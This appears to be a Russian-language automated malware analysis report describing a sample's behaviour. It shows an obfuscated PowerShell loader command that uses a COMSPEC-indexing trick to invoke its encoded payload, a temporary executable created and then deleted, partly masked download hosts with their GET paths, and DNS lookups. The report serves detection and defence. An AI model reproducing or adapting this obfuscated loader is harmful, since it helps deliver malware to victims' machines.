Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $ENV:cOMSpeC[4,15,25]-Join'')([STriNg]::joiN( '', ('14,93u127u65H78,67m65H10G23G10d68u79H93u7{69G72Q64Y79u73Y94Y10G88Y75m68%78Y69,71H17G14m95%102G95%99d64%10H23m10d68d79Q93H7m69%72Y64G79m73...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\499233.exe
Удаляет следующие файлы
- %TEMP%\499233.exe
Сетевая активность
Подключается к
- 'ro###cech.com':80
- 'ro###cech.com':443
- 'tr##e.org':80
- 'we#####.#yregisteredsite.com':80
- 'de##rmc.pl':80
TCP
Запросы HTTP GET
- http://ro###cech.com/IkfetL/
- http://tr##e.org/bTviDMv3lH/
- http://we#####.#yregisteredsite.com/frozen-redirect.html
- http://de##rmc.pl/js/vS1WyHUCe2/
Другие
- 'ro###cech.com':443
UDP
- DNS ASK ro###cech.com
- DNS ASK le####edoces.com.br
- DNS ASK tr##e.org
- DNS ASK we#####.#yregisteredsite.com
- DNS ASK de##rmc.pl
- DNS ASK te###ydom19.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $ENV:cOMSpeC[4,15,25]-Join'')([STriNg]::joiN( '', ('14,93u127u65H78,67m65H10G23G10d68u79H93u7{69G72Q64Y79u73Y94Y10G88Y75m68%78Y69,71H17G14m95%102G95%99d64%10H23m10d68d79Q93H7m69%72Y64G79m73...' (со скрытым окном)
